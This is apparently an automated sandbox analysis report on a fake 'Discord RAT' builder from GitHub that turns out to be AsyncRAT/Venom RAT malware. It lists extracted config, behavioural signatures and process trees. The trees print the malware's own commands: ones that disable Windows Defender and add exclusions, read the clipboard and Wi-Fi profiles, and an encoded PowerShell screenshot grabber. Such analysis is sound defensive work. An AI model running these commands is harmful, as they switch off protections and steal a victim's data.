Analysis
-
max time kernel
664s -
max time network
671s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
24-05-2024 01:01
General
-
Target
https://github.com/ASTR0C0/Discord-Rat-Full-Control
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
C_0
zcolcgnbpquzsrmecm
-
delay
1
-
install
true
-
install_file
DiscordRat FULL PC CONTROL.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/LwwcrLg4
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 17 IoCs
-
UPX packed file 56 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 10 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 60 IoCs
-
Suspicious use of SendNotifyMessage 48 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/ASTR0C0/Discord-Rat-Full-Control1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9a1dd46f8,0x7ff9a1dd4708,0x7ff9a1dd47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5628 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,17415556173002759083,11773857697914875737,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\Discord Rat Build FULL PC CONTROL.exe"C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\Discord Rat Build FULL PC CONTROL.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\TokenLogin.txt1⤵
-
C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\IF NOT WORKING RUN THIS.exe"C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\IF NOT WORKING RUN THIS.exe"1⤵
-
C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\IF NOT WORKING RUN THIS.exe"C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\IF NOT WORKING RUN THIS.exe"2⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\IF NOT WORKING RUN THIS.exe'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\IF NOT WORKING RUN THIS.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​  ​ .scr'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​  ​ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\td4ryo2i\td4ryo2i.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF49.tmp" "c:\Users\Admin\AppData\Local\Temp\td4ryo2i\CSC3601BDB486314908BFEB999E62E1ED17.TMP"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2432"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24324⤵
- Kills process with taskkill
-
